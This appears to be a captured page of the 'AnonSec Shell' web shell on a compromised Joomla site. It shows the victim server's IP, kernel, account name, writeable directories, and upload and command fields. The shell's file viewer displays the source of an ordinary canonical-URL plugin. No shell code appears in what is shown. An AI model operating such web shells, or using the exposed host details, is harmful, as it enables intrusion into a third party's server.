AnonSec Shell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.111
Web Server : Apache
System : Linux webm013.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : coopiak ( 151928)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/coopiak/amisdesseniors-fr/montpellier/plugins/system/aimycanonical/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/coopiak/amisdesseniors-fr/montpellier/plugins/system/aimycanonical/aimycanonical.php
<?php
/*
 * Copyright (c) 2017-2025 Aimy Extensions, Netzum Sorglos Software GmbH
 * Copyright (c) 2013-2017 Aimy Extensions, Lingua-Systems Software GmbH
 *
 * https://www.aimy-extensions.com/
 *
 * License: GNU GPLv2, see LICENSE.txt within distribution and/or
 *          http://www.aimy-extensions.com/software-license.html
 */
 defined( '_JEXEC' ) or die(); use Joomla\CMS\Plugin\CMSPlugin; use Joomla\CMS\Factory; use Joomla\CMS\Uri\Uri; use Joomla\CMS\Router\Router; use Joomla\CMS\Router\Route; use Joomla\CMS\HTML\HTMLHelper; class plgSystemAimyCanonical extends CMSPlugin { private $noindex = false; private $href = null; const TRAILING_SLASHES_AS_IS = 0; const TRAILING_SLASHES_REMOVE = 1; const TRAILING_SLASHES_ADD = 2; function onBeforeCompileHead() { $sef_on = self::get_joomla_config( 'sef', false ); $domain = $this->params->get( 'domain', isset( $_SERVER[ 'HTTP_HOST' ] ) ? $_SERVER[ 'HTTP_HOST' ] : '' ); $proto = $this->params->get( 'protocol', null ); $app = Factory::getApplication(); $doc = Factory::getDocument(); if ( ! self::in_frontend() or $doc->getType() != 'html' ) { return; } if ( empty( $domain ) ) { return; } if ( intVal( Factory::getUser()->id ) > 0 ) { $doc->addCustomTag( '<!-- Aimy Canonical: canonical link tag omitted ' . 'as you are logged in -->' ); return; } if ( $robots = $doc->getMetaData( 'robots' ) ) { if ( stripos( $robots, 'noindex' ) !== false ) { $this->noindex = true; } } $ctx_option = $app->input->getCmd( 'option', '' ); $ctx_view = $app->input->getCmd( 'view', '' ); $ctx = $ctx_option . '.' . $ctx_view; if ( $ctx == 'com_sppagebuilder.form' ) { return; } $c_url = null; foreach ( $doc->_links as $url => $attr ) { if ( $attr[ 'relation' ] === 'canonical' ) { $c_url = $url; unset( $doc->_links[ $url ] ); } } if ( is_null( $c_url ) && isset( $doc->_custom ) ) { foreach ( $doc->_custom as $i => $tag ) { if ( preg_match( '#rel=["\']?canonical["\']?#', $tag ) ) { if ( preg_match( '#href=(["\'])([^"\']*)\1#', $tag, $m ) ) { $c_url = htmlspecialchars_decode( trim( $m[ 2 ] ) ); unset( $doc->_custom[ $i ] ); } elseif ( preg_match( '#href=(\S+)#', $tag, $m ) ) { $c_url = htmlspecialchars_decode( trim( $m[ 1 ] ) ); unset( $doc->_custom[ $i ] ); } } } } if ( $sef_on ) { if ( $this->params->get( 'use_docbase', false ) || ( $ctx_option == 'com_virtuemart' && ( ! $c_url || strpos( $c_url, '?' ) !== false ) ) ) { $base = $doc->getBase(); if ( ! empty( $base ) ) { $c_url = $base; } } } $cur_url = Uri::getInstance()->toString(); $uri = new Uri( empty( $c_url ) ? $cur_url : $c_url ); $uri->setHost( self::fix_domain_input( $domain ) ); if ( ! empty( $proto ) ) { $uri->setScheme( $proto ); } if ( strVal( $uri->getQuery() ) == "" && ! empty( $_SERVER[ 'QUERY_STRING' ] ) ) { $uri->setQuery( $_SERVER[ 'QUERY_STRING' ] ); } if ( $sef_on && preg_match( '#/index\.php$#', $uri->getPath() ) && strpos( $uri->getQuery(), 'option=' ) !== false ) { $mpath = self::get_path_by_menu( $uri ); if ( $mpath ) { $uri->setPath( $mpath ); $uri->setQuery( '' ); } } if ( $sef_on ) { $spec = false; $needs_Itemid = false; if ( $ctx == 'com_content.article' ) { $spec = array( 'table' => 'content', 'fields' => array( 'id', 'alias', 'catid', 'language' ) ); } elseif ( $ctx == 'com_content.category' ) { $spec = array( 'table' => 'categories', 'fields' => array( 'id', 'alias', 'language' ) ); } elseif ( $ctx == 'com_tags.tag' ) { $spec = array( 'table' => 'tags', 'fields' => array( 'id', 'alias', 'language' ) ); $needs_Itemid = true; } if ( $spec ) { $o = self::get_db_object_by_id( $app->input->getUint( 'id', 0 ), $spec[ 'table' ], $spec[ 'fields' ] ); if ( ! empty( $o ) && isset( $o->id ) ) { $nsef = 'index.php?' . 'option=' . $ctx_option . '&' . 'view=' . $ctx_view . '&' . 'id=' . $o->id . ':' . $o->alias; $menu_id = self::get_menu_id_by_query( 'option=' . $ctx_option . '&view=' . $ctx_view . '&id=' . $o->id ); if ( $menu_id ) { $nsef .= '&itemid=' . $menu_id; } else { if ( $needs_Itemid ) { $Itemid = $app->input->get( 'Itemid', 0, 'int' ); if ( $Itemid && ! self::is_home_menu_item( $Itemid ) ) { $nsef .= '&Itemid=' . $Itemid; } } } if ( ! empty( $o->language ) && $o->language !== '*' ) { $nsef .= '&lang=' . $o->language; } if ( ! empty( $o->catid ) ) { $nsef .= '&catid=' . $o->catid; } $sef_url = Route::_( $nsef ); if ( $ctx == 'com_tags.tag' && preg_match( '#\?Itemid=\d+$#', $sef_url, $m ) ) { $sef_url = str_replace( $m[0], '', $sef_url ); } if ( $menu_id && preg_match( '#\?itemid=\d+$#', $sef_url, $m ) ) { $sef_url = str_replace( $m[0], '', $sef_url ); } if ( strpos( $sef_url, '?' ) === false ) { $uri->setQuery( '' ); $uri->setPath( $sef_url ); } if ( ! empty( $_SERVER[ 'QUERY_STRING' ] ) ) { $out = array( 'id', 'catid', 'option', 'view', 'task', 'itemid', 'Itemid', 'rCH' ); parse_str( $_SERVER[ 'QUERY_STRING' ], $qsps ); if ( is_array( $qsps ) && ! empty( $qsps ) ) { $keep = array(); foreach ( $qsps as $k => $v ) { if ( ! in_array( $k, $out ) ) { $keep[ $k ] = $v; } } if ( ! empty( $keep ) ) { $uri->setQuery( http_build_query( $keep ) ); } } } } } } if ( strpos( $uri->getPath(), '/' ) !== 0 ) { $uri->setPath( '/' . $uri->getPath() ); } if ( $sef_on && $this->params->get( 'remove_query_string', false ) ) { $uri->setQuery( '' ); if ( $this->params->get( 'add_pagination_qs', false ) ) { $start = $app->input->get( 'start', 0, 'int' ) ?: $app->input->get( 'limitstart', 0, 'int' ); if ( $start > 0 ) { $uri->setQuery( 'start=' . $start ); } } if ( $this->params->get( 'add_search_qs', false ) ) { $qs = array(); if ( $ctx == 'com_finder.search' ) { $q = $app->input->get( 'q', false, 'string' ); if ( ! empty( $q ) ) { $qs[] = 'q=' . $q; } $t = $app->input->get( 't', false ); if ( ! empty( $t ) && is_array( $t ) ) { foreach ( $t as $ti ) { $qs[] = 't[]=' . $ti; } } } elseif ( $ctx == 'com_search.search' ) { $q = $app->input->get( 'searchword', false, 'string' ); if ( ! empty( $q ) ) { $qs[] = 'searchword=' . $q; } $sp = $app->input->get( 'searchphrase', false, 'string' ); if ( ! empty( $sp ) ) { $qs[] = 'searchphrase=' . $sp; } } if ( ! empty( $qs ) ) { $uri->setQuery( implode( '&', $qs ) ); } } } if ( $sef_on && ! version_compare( JVERSION, '3.5', '<' ) && $uri->getQuery() == '' && preg_match( '#/index\.php/*$#', $uri->getPath() ) ) { $uri->setPath( preg_replace( '#/index\.php/*$#', '/', $uri->getPath() ) ); } if ( $sef_on ) { $ts = $this->params->get( 'trailing_slashes', self::TRAILING_SLASHES_AS_IS ); $p = $uri->getPath(); $r = Uri::root( true ) . '/'; if ( $ts == self::TRAILING_SLASHES_REMOVE ) { if ( $p == $r ) { $rmhp = $this->params->get( 'trailing_slashes_remove_on_homepage', false ); if ( $rmhp ) { $p = rtrim( $p, '/' ); } } else { if ( substr( $p, -1, 1 ) == '/' ) { $p = preg_replace( '#/+$#', '', $p ); } } } if ( self::get_joomla_config( 'sef_suffix', false ) ) { if ( ! empty( $p ) && ! preg_match( '#(?:/|\.html|\.php|/)$#', $p ) && ! self::is_language_prefix_path( $p ) ) { $p .= '.html'; } } else { if ( $ts == self::TRAILING_SLASHES_ADD ) { if ( $p != $r && substr( $p, -1, 1 ) != '/' ) { $p .= '/'; } } } $uri->setPath( $p ); } if ( $sef_on && !! $uri->getPath() && $this->params->get( 'remove_index_php', false ) && self::get_joomla_config( 'sef_rewrite', false ) ) { $root = trim( strVal( Uri::root( true ) ), '/' ); $p_cur = $uri->getPath(); $p_new = preg_replace( '#^/?(\Q' . $root . '\E)/index\.php/#', '/$1/', $p_cur ); $p_new = '/' . ltrim( $p_new, '/' ); if ( $p_cur != $p_new ) { $uri->setPath( $p_new ); } } if ( $sef_on && ( $case = $this->params->get( 'convert_case', 0 ) ) ) { $path = $uri->getPath(); if ( $case == 1 ) { $path = function_exists( 'mb_strtolower' ) ? mb_strtolower( $path ) : strtolower( $path ); } elseif ( $case == 2 ) { $path = function_exists( 'mb_strtoupper' ) ? mb_strtoupper( $path ) : strtoupper( $path ); } $uri->setPath( $path ); } if ( $sef_on && $this->params->get( 'custom_urls', false ) ) { $id = $app->input->get( 'id', 0, 'INT' ); if ( is_array( $id ) && ! empty( $id ) && isset( $id[ 0 ] ) ) { $id = $id[ 0 ]; } $cdata = $this->get_custom_canonical_data( $ctx, $id ); if ( isset( $cdata[ 'path' ] ) && $cdata[ 'path' ] ) { $uri->setPath( $cdata[ 'path' ] ); $uri->setQuery( '' ); } if ( isset( $cdata[ 'override' ] ) && $cdata[ 'override' ] ) { if ( isset( $cdata[ 'protocol' ] ) && $cdata[ 'protocol' ] ) { $uri->setScheme( $cdata[ 'protocol' ] ); } if ( isset( $cdata[ 'domain' ] ) && $cdata[ 'domain' ] ) { $uri->setHost( $cdata[ 'domain' ] ); } } } $url = self::juri_to_url_obj( $uri ); if ( ! empty( $url->query ) ) { $do_cleanup = $this->params->get( 'cleanup_query_string' ); parse_str( $url->query, $qparts ); if ( $do_cleanup ) { ksort( $qparts, SORT_STRING ); } $qs = http_build_query( $qparts ); if ( $do_cleanup ) { $qs = preg_replace( '#=$#', '', preg_replace( '#=&#', '&', $qs ) ); } $url->query = $qs; } if ( $this->params->get( 'redirect', false ) ) { $cur = self::juri_to_url_obj( new Uri( $cur_url ) ); if ( $this->params->get( 'redirect_on_proto', false ) && $cur->scheme != $url->scheme ) { $cur->scheme = $url->scheme; } if ( $this->params->get( 'redirect_on_domain', false ) && $cur->host != $url->host ) { $cur->host = $url->host; } if ( $this->params->get( 'redirect_on_path', false ) && $cur->path != $url->path && ! $this->is_amp_path( $cur->path ) ) { $cur->path = $url->path; } if ( $this->params->get( 'redirect_on_query_string', false ) && $cur->query != $url->query ) { $cur->query = $url->query; } require_once( __DIR__ . '/helpers/RedirectLoopChecker.php' ); $loop_checker = new AimyCanonical\Helpers\RedirectLoopChecker(); $redirect_url = self::url_obj_to_string( $cur, true ); if ( $redirect_url != $cur_url ) { if ( $loop_checker->wouldBeLoop( $redirect_url ) ) { if ( defined( 'JDEBUG' ) && JDEBUG ) { Joomla\CMS\Log\Log::add( sprintf( 'prevented redirect loop on %s (-> %s)', $cur_url, $redirect_url ), Joomla\CMS\Log\Log::DEBUG, 'aimycanonical' ); } } else { $loop_checker->storeRedirect( $redirect_url ); $app->redirect( $redirect_url, 301 ); } } } if ( ! $this->noindex ) { $this->href = self::url_obj_to_string( $url, true ); } } public function onAfterRender() { if ( empty( $this->href ) ) { return; } if ( $this->noindex && ! $this->params->get( 'cleanup_head', false ) ) { return; } $app = Factory::getApplication(); if ( ! self::in_frontend() ) { return; } $doc = Factory::getDocument(); if ( $doc->getType() !== 'html' ) { return; } $html = $app->getBody(); if ( ! is_string( $html ) or empty( $html ) ) { return false; } $can_link = sprintf( '<link rel="canonical" href="%s" />', htmlspecialchars( $this->href, ENT_COMPAT, 'UTF-8', false ) ); if ( preg_match( '#(<head[^>]*>)(.*?)(</head\s*>)#si', $html, $m ) ) { $h = $m[ 2 ]; if ( $this->params->get( 'cleanup_head', false ) ) { $h = preg_replace( '#<link[^>]+?rel=["\']?canonical["\']?[^>]+?/?>\s*#si', '', $h ); } if ( ! $this->noindex ) { $html = str_replace( $m[0], sprintf( "%s\n%s\n%s\n%s\n", trim( $m[1] ), trim( $h ), $can_link, trim( $m[3] ) ), $html ); } else { if ( $this->params->get( 'cleanup_head', false ) ) { $html = str_replace( $m[0], sprintf( "%s\n%s\n%s\n", trim( $m[1] ), trim( $h ), trim( $m[3] ) ), $html ); } } $app->setBody( $html ); } } private function is_amp_path( $path ) { return preg_match( '#(?:/amp/?|\.amp\.html)$#', $path ); } private function get_custom_canonical_data( $ctx, $id ) { $app = Factory::getApplication(); $menu = $app->getMenu(); $cdata = array( 'path' => false, 'override' => false, 'protocol' => false, 'domain' => false ); if ( is_object( $menu ) ) { $mitem = $menu->getActive(); if ( is_object( $mitem ) && isset( $mitem->link ) ) { $ca = explode( '.', $ctx, 2 ); if ( count( $ca ) == 2 && strpos( $mitem->link, 'option=' . $ca[ 0 ] ) !== false && strpos( $mitem->link, 'view=' . $ca[ 1 ] ) !== false ) { $linked_id = false; if ( preg_match( '#id(?:\[0\])?=(\d+)#', $mitem->link, $m ) ) { $linked_id = $m[ 1 ]; } if ( ! $id or ( $linked_id && $linked_id == $id ) ) { $mitem_params = null; if ( method_exists( $mitem, 'getParams' ) ) { $mitem_params = $mitem->getParams(); } else if ( is_object( $mitem->params ) ) { $mitem_params = $mitem->params; } if ( is_object( $mitem_params ) ) { $cdata[ 'path' ] = $mitem_params->get( 'aimy_cncl_cpath', false ); $cdata[ 'override' ] = $mitem_params->get( 'aimy_cncl_override', false ); $cdata[ 'protocol' ] = $mitem_params->get( 'aimy_cncl_cprotocol', false ); $cdata[ 'domain' ] = $mitem_params->get( 'aimy_cncl_cdomain', false ); } } } } } $d = false; if ( $ctx == 'com_content.article' && $id > 0 ) { $o = self::get_db_object_by_id( $id, 'content', array( 'attribs' ) ); if ( is_object( $o ) ) { $d = json_decode( $o->attribs ); } } else if ( $ctx == 'com_tags.tag' && $id > 0 ) { $o = self::get_db_object_by_id( $id, 'tags', array( 'params' ) ); if ( is_object( $o ) ) { $d = json_decode( $o->params ); } } else if ( $ctx == 'com_content.category' && $id > 0 ) { $o = self::get_db_object_by_id( $id, 'categories', array( 'params' ) ); if ( is_object( $o ) ) { $d = json_decode( $o->params ); } } if ( $d && is_object( $d ) ) { if ( ! $cdata[ 'path' ] && isset( $d->aimy_cncl_cpath ) ) { $cdata[ 'path' ] = $d->aimy_cncl_cpath; } if ( ! $cdata[ 'override' ] && isset( $d->aimy_cncl_override ) ) { $cdata[ 'override' ] = $d->aimy_cncl_override; } if ( ! $cdata[ 'protocol' ] && isset( $d->aimy_cncl_cprotocol ) ) { $cdata[ 'protocol' ] = $d->aimy_cncl_cprotocol; } if ( ! $cdata[ 'domain' ] && isset( $d->aimy_cncl_cdomain ) ) { $cdata[ 'domain' ] = $d->aimy_cncl_cdomain; } } if ( isset( $cdata[ 'path' ] ) && $cdata[ 'path' ] ) { $v = self::fix_path_input( $cdata[ 'path' ] ); if ( ! empty( $v ) ) { $cdata[ 'path' ] = $v; } } if ( isset( $cdata[ 'domain' ] ) && $cdata[ 'domain' ] ) { $v = self::fix_domain_input( $cdata[ 'domain' ] ); if ( ! empty( $v ) ) { $cdata[ 'domain' ] = $v; } } return $cdata; } public function onContentPrepareForm( $form, $data ) { if ( ! $this->params->get( 'custom_urls', false ) ) { return true; } $ctx = $form->getName(); $file = false; if ( $ctx == 'com_content.article' ) { $file = 'generic-attribs'; } else if ( $ctx == 'com_categories.categorycom_content' or $ctx == 'com_menus.item' or $ctx == 'com_tags.tag' ) { $file = 'generic-params'; } if ( $file ) { Factory::getLanguage()->load( 'plg_system_aimycanonical', JPATH_ADMINISTRATOR ); $form->addFormPath( __DIR__ . '/forms/' ); $form->loadFile( $file ); if ( strpos( strVal( JVERSION ), '3.' ) !== 0 ) { Factory::getDocument()->addScriptDeclaration( 'function aimycanonicalParents(el, sel)' . '{' . 'var ps = [];' . 'while ((el = el.parentNode) && el !== document)' . '{' . 'if (!sel || el.matches(sel))' . '{' . 'ps.push(el);' . '}' . '}' . 'return ps;' . '}' . 'document.addEventListener(' . '"DOMContentLoaded",function()' . '{' . 'var el = document.querySelector(' . '".aimycanonical-intro"' . ');' . 'if (el)' . '{' . 'var ps = aimycanonicalParents(' . 'el,' . '".control-group"' . ');' . 'if (ps.length)' . '{' . 'ps[0].className = "";' . '}' . '}' . '});' ); } } if ( $ctx == 'com_menus.item' ) { HTMLHelper::_( 'jquery.framework' ); Factory::getDocument()->addScriptDeclaration( 'jQuery(document).ready(function($)' . '{' . 'function handleMenuType()' . '{' . 'var mt = $("input[name=\'jform[type]\']").val();' . 'if (!mt){return;}' . 'if (mt == "alias" || mt == "heading" || ' . 'mt == "separator" || mt == "url")' . '{' . '$("#jform_params_aimy_cncl_override0")' . '.trigger("click");' . '$("#jform_params_aimy_cncl_cpath,' . '#jform_params_aimy_cncl_cdomain")' . '.attr("disabled", "disabled")' . '.val("");' . '$("input[name=\'jform[params]' . '[aimy_cncl_override]\'],' . 'input[name=\'jform[params]' . '[aimy_cncl_cprotocol]\'],' . '#jform_params_aimy_cncl_override")' . '.attr("disabled", "disabled");' . '}' . '}' . '$("#jform_type").change(handleMenuType);' . 'handleMenuType();' . '});' ); } return true; } static private function fix_domain_input( $domain ) { return preg_replace( '/\/.*$/', '', preg_replace( '/^[^\/]*?:\/\/+/', '', trim( $domain ) ) ); } static private function get_joomla_config( $key, $dflt = null ) { $app = Factory::getApplication(); if ( version_compare( JVERSION, '3.3.0', '<' ) ) { return $app->getCfg( $key, $dflt ); } else { return $app->get( $key, $dflt ); } } static private function in_frontend() { $app = Factory::getApplication(); if ( strpos( strVal( JVERSION ), '3.' ) === 0 ) { return $app->isSite(); } return $app->isClient( 'site' ); } static private function fix_path_input( $path ) { $path = preg_replace( '#^https?://[^/]+(/+)#i', '$1', preg_replace( '#[\?\#].*$#', '', trim( $path ) ) ); if ( strpos( $path, '/' ) === 0 ) { $path = '/' . ltrim( $path, '/' ); } else { $base = rtrim( Uri::base( true ), '/' ); if ( self::get_joomla_config( 'sef', false ) && ! self::get_joomla_config( 'sef_rewrite', 0 ) && strpos( $path, 'index.php' ) !== 0 ) { $path = $base . '/index.php/' . $path; } else { $path = $base . '/' . $path; } } return implode( '/', array_map( 'rawurlencode', explode( '/', $path ) ) ); } static private function get_db_object_by_id( $id, $tbl, $flds ) { if ( empty( $id ) or ! is_numeric( $id ) or empty( $tbl ) or ! is_string( $tbl ) or empty( $flds ) or ! is_array( $flds ) ) { return null; } $o = null; try { $db = Factory::getDbo(); $q = $db->getQuery( true ); $q->select( $db->quoteName( $flds ) ) ->from( '#__' . $tbl ) ->where( $db->quoteName( 'id' ) . '=' . $db->quote( $id ) ); $db->setQuery( $q ); $o = $db->loadObject(); if ( ! is_object( $o ) ) { $o = null; } } catch ( Exception $e ){ } return $o; } static private function get_path_by_menu( $uri ) { $menu_id = self::get_menu_id_by_query( $uri->getQuery() ); if ( ! $menu_id ) { return false; } $app = Factory::getApplication(); $menu = $app->getMenu(); $ropt = array(); if ( strpos( strVal( JVERSION ), '3.' ) === 0 ) { $ropt[ 'mode' ] = JROUTER_MODE_SEF; } if ( $menu->setActive( $menu_id ) ) { $r = JRouter::getInstance( 'site', $ropt ); return $r->build( 'index.php' . '?' . $uri->getQuery() ) ->toString(); } return false; } static private function get_menu_id_by_query( $qs ) { $lang = Factory::getLanguage()->getTag(); $qa = explode( '&', $qs ); sort( $qa ); $qa = serialize( $qa ); $rows = false; try { $db = Factory::getDbo(); $q = $db->getQuery( true ); $q->select( $db->quoteName( array( 'id', 'link' ) ) ) ->from( '#__menu' ) ->where( $db->quoteName( 'language' ) . '=' . $db->quote( '*' ) . ' OR ' . $db->quoteName( 'language' ) . '=' . $db->quote( '' ) . ' OR ' . $db->quoteName( 'language' ) . '=' . $db->quote( $lang ) ); $db->setQuery( $q ); $rows = $db->loadRowList(); } catch ( Exception $e ){ } if ( ! $rows ) { return false; } foreach ( $rows as $i => $row ) { $l = explode( '&', preg_replace( '#^index\.php\?#', '', $row[ 1 ] ) ); sort( $l ); $l = serialize( $l ); if ( $l == $qa ) { return $row[ 0 ]; } } return false; } static private function is_home_menu_item( $id ) { $o = self::get_db_object_by_id( $id, 'menu', array( 'home' ) ); if ( is_object( $o ) ) { return !! $o->home; } return false; } static private function is_language_prefix_path( $path ) { if ( empty( $path ) ) { return false; } if ( strpos( $path, Uri::base( true ) ) === 0 ) { $path = substr( $path, strlen( Uri::base( true ) ), null ); } $path = trim( $path, '/' ); if ( strpos( $path, 'index.php/' ) === 0 ) { $path = substr( $path, 10, null ); } if ( strpos( $path, '/' ) !== false ) { return false; } try { $db = Factory::getDbo(); $q = $db->getQuery( true ); $q->select( $db->quoteName( 'sef' ) ) ->from( '#__languages' ) ->where( $db->quoteName( 'sef' ) . ' = ' . $db->quote( $path ) . ' AND ' . $db->quoteName( 'published' ) . ' = 1' ); $db->setQuery( $q ); $r = $db->loadResult(); return ( ! empty( $r ) ); } catch ( Exception $e ){ } return false; } static private function encode_path( $p ) { $p = str_replace( ' ', '%20', $p ); $ps = str_split( $p ); $res = ''; foreach ( $ps as $c ) { $res .= ( ord( $c ) > 0x7f ? urlencode( $c ) : $c ); } return $res; } static private function url_obj_to_string( $uo, $encode = false ) { $s = $uo->scheme . '://' . $uo->host; if ( ! empty( $uo->port ) ) { $s .= ':' . $uo->port; } $s .= $encode ? self::encode_path( $uo->path ) : $uo->path; if ( ! empty( $uo->query ) ) { $s .= '?' . $uo->query; } return $s; } static private function juri_to_url_obj( $juri ) { $url = new StdClass(); $url->scheme = $juri->getScheme(); $url->host = $juri->getHost(); $url->port = $juri->getPort(); $url->path = $juri->getPath(); $url->query = $juri->getQuery(); return $url; } public function onExtensionAfterSave( $context, $table, $isNew, $data = array() ) { if ( strpos( JVERSION, '3.' ) !== 0 ) { return; } if ( $context != 'com_plugins.plugin' or ! is_object( $table ) or ! property_exists( $table, 'element' ) or $table->element != 'aimycanonical' ) { return; } if ( ! is_array( $data ) or empty( $data ) or ! isset( $data[ 'params' ] ) or ! is_array( $data[ 'params' ] ) or ! isset( $data[ 'params' ][ 'dl_key' ] ) ) { return; } $key = trim( $data[ 'params' ][ 'dl_key' ] ); require_once( __DIR__ . '/helpers/DownloadKeyHelper.php' ); try { AimyCanonical\Helpers\DownloadKeyHelper::passKeyToUpdatesites( $key ); } catch ( Exception $e ) { Factory::getApplication( 'Failed to pass download key to update sites: ' . $e->getMessage(), 'error' ); } } public function onInstallerBeforePackageDownload( &$url, &$headers ) { if ( ! strpos( $url, 'aimy-extensions.com' ) or ! strpos( $url, '/plg_AimyCanonical/' ) ) { return; } require_once( __DIR__ . '/helpers/DownloadKeyHelper.php' ); $rv = AimyCanonical\Helpers\DownloadKeyHelper::validateKey(); if ( is_object( $rv ) && ! $rv->valid && isset( $rv->msg ) ) { Factory::getApplication()->enqueueMessage( '<b>Aimy Canonical: ' . $rv->msg . '</b>', 'error' ); } } } 

Anon7 - 2022
AnonSec Team